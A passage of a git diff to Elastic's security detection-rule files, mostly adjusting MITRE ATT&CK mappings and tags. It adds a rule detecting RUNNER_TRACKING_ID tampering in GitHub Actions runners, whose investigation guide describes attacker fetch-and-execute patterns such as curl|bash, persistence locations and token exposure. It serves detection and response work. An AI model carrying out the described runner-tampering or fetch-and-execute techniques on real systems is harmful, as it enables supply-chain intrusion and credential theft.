"Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml index da67ad548c5..ac4891f7ad4 100644 --- a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml +++ b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/26" [rule] author = ["Elastic"] @@ -21,7 +21,16 @@ references = [ risk_score = 73 rule_id = "23c53c4c-aa8b-4b07-85c0-fe46a9c8acaf" severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -75,64 +84,24 @@ note = """## Triage and analysis [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" -[[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml index b204ba78215..8ca0cdb5a1f 100644 --- a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml +++ b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/27" [rule] author = ["Elastic"] @@ -26,7 +26,16 @@ references = [ risk_score = 73 rule_id = "c3f5e1d8-910e-43b4-8d44-d748e498ca86" severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -100,31 +109,24 @@ Java Naming and Directory Interface (JNDI) is a Java API that provides naming an [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/execution_via_github_actions_runner.toml b/rules/cross-platform/execution_via_github_actions_runner.toml index 970fad9a796..08782e87f48 100644 --- a/rules/cross-platform/execution_via_github_actions_runner.toml +++ b/rules/cross-platform/execution_via_github_actions_runner.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/26" [rule] author = ["Elastic"] @@ -65,7 +65,24 @@ references = [ risk_score = 47 rule_id = "a640ef5b-e1da-4b17-8391-468fdbd1b517" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Auditd Manager", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Auditd Manager", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -82,48 +99,32 @@ process where event.type == "start" and event.action in ("exec", "exec_event", " [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" [[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique.subtechnique]] -id = "T1059.011" -name = "Lua" -reference = "https://attack.mitre.org/techniques/T1059/011/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml new file mode 100644 index 00000000000..ebd0cb49ce7 --- /dev/null +++ b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml @@ -0,0 +1,163 @@ +[metadata] +creation_date = "2025/11/27" +integration = ["endpoint"] +maturity = "production" +updated_date = "2025/11/27" + +[rule] +author = ["Elastic"] +description = """ +This rule detects processes spawned by GitHub Actions runners where "RUNNER_TRACKING_ID" is overridden from its +default "github_*" value. Such tampering has been associated with attempts to evade runner tracking/cleanup on +self-hosted runners, including behavior observed in the Shai-Hulud 2.0 npm worm campaign. +""" +from = "now-9m" +index = ["logs-endpoint.events.process*"] +language = "eql" +license = "Elastic License v2" +name = "Tampering with RUNNER_TRACKING_ID in GitHub Actions Runners" +note = """## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Tampering with RUNNER_TRACKING_ID in GitHub Actions Runners + +This rule surfaces processes launched by GitHub Actions runners where RUNNER_TRACKING_ID is deliberately set to a non-default value. Attackers do this to break runner job tracking and cleanup on self-hosted runners, enabling long‑lived or hidden workloads. A common pattern is a workflow step that exports a custom RUNNER_TRACKING_ID and then spawns bash or node to fetch and execute a script via curl|bash or npm install scripts, keeping the process alive after the job finishes to run mining or exfil tasks. + +### Possible investigation steps + +- Correlate the event to its GitHub Actions run/job and workflow YAML, identify the repository and actor (commit/PR), and verify whether RUNNER_TRACKING_ID was explicitly set in the workflow or injected by a step script. +- On the runner host, determine if the spawned process persisted beyond job completion by checking for orphaning or reparenting to PID 1, sustained CPU/memory usage, and timestamps relative to the runner process exit. +- Review nearby telemetry for fetch-and-execute patterns (curl|bash, wget, node/npm lifecycle scripts), unexpected file writes under /tmp or actions-runner/_work, and outbound connections to non-GitHub endpoints. +- Enumerate persistence artifacts created during the run, including crontab entries, systemd unit files, pm2 or nohup sessions, and changes to authorized_keys or rc.local, and tie them back to the suspicious process. +- Assess blast radius by listing secrets and tokens available to the job, checking audit logs for their subsequent use from the runner IP or unusual repositories, and decide whether to revoke or rotate credentials. + +### False positive analysis + +- A self-hosted runner bootstrap script or base image intentionally sets a fixed RUNNER_TRACKING_ID for internal log correlation or debugging, causing all runner-spawned processes to inherit a non-github_* value. +- A composite action or reusable workflow accidentally overrides RUNNER_TRACKING_ID through env mapping or variable expansion (for example templating it from the run ID), resulting in benign non-default values during standard jobs. + +### Response and remediation + +- Quarantine the self-hosted runner by stopping Runner.Listener, removing the runner from the repository/organization, and terminating any Runner.Worker children or orphaned processes (PID 1) that carry a non-default RUNNER_TRACKING_ID. +- Purge persistence by removing artifacts created during the run, including systemd unit files under /etc/systemd/system, crontab entries in /var/spool/cron, pm2/nohup sessions, edits to ~/.ssh/authorized_keys or /etc/rc.local, and files under /tmp and actions-runner/_work linked to the tampered process. +- Revoke and rotate credentials exposed to the job (GITHUB_TOKEN, personal access tokens, cloud keys), delete leftover containers and caches in actions-runner/_work, invalidate the runner registration, and redeploy the runner from a clean, patched image. +- Escalate to incident response if you observe outbound connections to non-GitHub endpoints, processes persisting after job completion, modifications to ~/.ssh/authorized_keys or /etc/systemd/system, or repeated RUNNER_TRACKING_ID tampering across runners or repositories. +- Harden by restricting self-hosted runners to trusted repositories and actors, enforcing ephemeral per-job runners with egress allowlisting to github.com, setting strict job timeouts, and adding a workflow guard step that exits if RUNNER_TRACKING_ID does not start with github_.""" +references = [ + "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", + "https://socket.dev/blog/shai-hulud-strikes-again-v2", + "https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack", + "https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/", +] +risk_score = 47 +rule_id = "df0553c8-2296-45ef-b4dc-3b88c4c130a7" +setup = """## Setup + +This rule requires data coming in from Elastic Defend. + +### Elastic Defend Integration Setup +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + +#### Prerequisite Requirements: +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html). + +#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html). +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html). +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). + +Elastic Defend integration does not collect environment variable logging by default. +In order to capture this behavior, this rule requires a specific configuration option set within the advanced settings of the Elastic Defend integration. + #### To set up environment variable capture for an Elastic Agent policy: +- Go to “Security → Manage → Policies”. +- Select an “Elastic Agent policy”. +- Click “Show advanced settings”. +- Scroll down or search for “linux.advanced.capture_env_vars”. +- Enter the names of environment variables you want to capture, separated by commas. +- For Linux, this rule requires the linux.advanced.capture_env_vars variable to be set to "RUNNER_TRACKING_ID". +- For macOS, this rule requires the macos.advanced.capture_env_vars variable to be set to "RUNNER_TRACKING_ID". +- Click “Save”. +After saving the integration change, the Elastic Agents running this policy will be updated and the rule will function properly. +For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html). +""" +severity = "medium" +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where host.os.type in ("linux", "macos") and event.type == "start" and event.action == "exec" and +process.parent.name in ("Runner.Worker", "Runner.Listener") and process.env_vars like~ "RUNNER_TRACKING_ID*" and +not process.env_vars like~ "RUNNER_TRACKING_ID=github_*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Initial Access" + id = "TA0001" + reference = "https://attack.mitre.org/tactics/TA0001/" + + [[rule.threat.technique]] + name = "Supply Chain Compromise" + id = "T1195" + reference = "https://attack.mitre.org/techniques/T1195/" + + [[rule.threat.technique.subtechnique]] + name = "Compromise Software Dependencies and Development Tools" + id = "T1195.001" + reference = "https://attack.mitre.org/techniques/T1195/001/" + + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" + + [[rule.threat.technique]] + name = "Impair Defenses" + id = "T1562" + reference = "https://attack.mitre.org/techniques/T1562/" + + [[rule.threat.technique.subtechnique]] + name = "Disable or Modify Tools" + id = "T1562.001" + reference = "https://attack.mitre.org/techniques/T1562/001/" diff --git a/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml b/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml index 3d12517555c..a0c85693771 100644 --- a/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml +++ b/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2026/01/26" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/09" [rule] author = ["Elastic"] @@ -125,3 +125,10 @@ post-compromise activity. - Monitor the environment for recurrence of similar high-CPU processes combined with security alerts. - Escalate the incident if multiple hosts or indicators suggest coordinated or widespread activity.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml b/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml index 814bf8f4631..a62746b856a 100644 --- a/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml +++ b/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2026/01/26" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/26" [rule] author = ["Elastic"] @@ -127,16 +127,6 @@ within a short time window. This combination may indicate malicious execution, r [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1496" -name = "Resource Hijacking" -reference = "https://attack.mitre.org/techniques/T1496/" - -[[rule.threat.technique.subtechnique]] -id = "T1496.001" -name = "Compute Hijacking" -reference = "https://attack.mitre.org/techniques/T1496/001/" - [rule.threat.tactic] id = "TA0040" name = "Impact" diff --git a/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml b/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml index 7f45c3c1b83..0c42ed1077a 100644 --- a/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml +++ b/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["azure", "o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -59,7 +59,20 @@ The Azure Fleet integration, Office 365 Logs Fleet integration, Filebeat module, risk_score = 73 rule_id = "f0cc239b-67fa-46fc-89d4-f861753a40f5" severity = "high" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in Logs", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide", "Rule Type: Higher-Order Rule"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra ID Sign-in Logs", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Resources: Investigation Guide", + "Rule Type: Higher-Order Rule", +] timestamp_override = "event.ingested" type = "esql" @@ -111,36 +124,14 @@ from logs-o365.audit-*, logs-azure.signinlogs-*, .alerts-security.* [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1114" -name = "Email Collection" -reference = "https://attack.mitre.org/techniques/T1114/" - -[[rule.threat.technique.subtechnique]] -id = "T1114.002" -name = "Remote Email Collection" -reference = "https://attack.mitre.org/techniques/T1114/002/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml b/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml index a3a7976428f..9bf079851a4 100644 --- a/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml +++ b/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml @@ -3,7 +3,7 @@ creation_date = "2026/02/27" maturity = "production" min_stack_comments = "ES|QL inline stats became generally available in 9.3.0 and MV_INTERSECTION is in preview since 9.3." min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/27" [rule] author = ["Elastic"] @@ -96,3 +96,18 @@ FROM logs-endpoint.alerts-*, logs-endpoint.events.process-* metadata _id, _versi | KEEP * ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" +[[rule.threat.technique.subtechnique]] +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml index a4661528dc3..bfb7916cda2 100644 --- a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml +++ b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "auditd_manager", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -61,7 +61,19 @@ references = [ risk_score = 73 rule_id = "ae3e9625-89ad-4fc3-a7bf-fced5e64f01b" severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: SentinelOne", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,16 +127,3 @@ reference = "https://attack.mitre.org/techniques/T1190/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml index 38047bc5492..dbee870beb8 100644 --- a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml +++ b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "Device mount events were added as part of the Elastic Defend Device Control feature." min_stack_version = "9.2.0" -updated_date = "2026/03/23" +updated_date = "2025/11/11" [rule] author = ["Elastic"] @@ -60,7 +60,17 @@ references = [ risk_score = 21 rule_id = "483832a8-ffdd-4e11-8e96-e0224f7bda9b" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Use Case: Device Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Use Case: Device Control", + "Tactic: Initial Access", + "Tactic: Exfiltration", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -71,21 +81,34 @@ host.os.type:(macos or windows) and event.type:device and event.action:mount and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1091" +name = "Replication Through Removable Media" +reference = "https://attack.mitre.org/techniques/T1091/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" - [[rule.threat.technique.subtechnique]] id = "T1052.001" name = "Exfiltration over USB" reference = "https://attack.mitre.org/techniques/T1052/001/" + + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [rule.new_terms] field = "new_terms_fields" value = ["device.serial_number", "host.id"] diff --git a/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml b/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml index 378b3ca7c56..1b1b7304706 100644 --- a/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml +++ b/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/09" [rule] author = ["Elastic"] @@ -68,18 +68,13 @@ This rule correlates a FortiGate SSL VPN login with a subsequent security alert [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +reference = "https://attack.mitre.org/tactics/TA0001/" \ No newline at end of file diff --git a/rules/cross-platform/initial_access_ollama_api_external_access.toml b/rules/cross-platform/initial_access_ollama_api_external_access.toml index 0219cc53c21..4a059992f9c 100644 --- a/rules/cross-platform/initial_access_ollama_api_external_access.toml +++ b/rules/cross-platform/initial_access_ollama_api_external_access.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/09" [rule] author = ["Elastic"] @@ -51,7 +51,19 @@ references = [ risk_score = 47 rule_id = "d8f2a1b3-c4e5-6789-abcd-ef0123456789" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: AI Model Access", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0040", "Mitre Atlas: T0044"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0040", + "Mitre Atlas: T0044", +] timestamp_override = "event.ingested" type = "eql" @@ -77,26 +89,14 @@ network where event.action == "connection_accepted" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0040" -name = "AI Model Inference API Access" -reference = "https://atlas.mitre.org/techniques/AML.T0040/" - -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" diff --git a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml index ae3136dc37d..6772035224b 100644 --- a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml +++ b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2020/09/14" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -70,3 +70,16 @@ Zoom meetings without passcodes are vulnerable to unauthorized access, known as - Coordinate with the communications team to prepare a response plan for any potential public relations issues arising from the incident, ensuring clear and consistent messaging.""" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml b/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml index 6f18ddb3bfa..c6700035c99 100644 --- a/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml +++ b/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml @@ -1,7 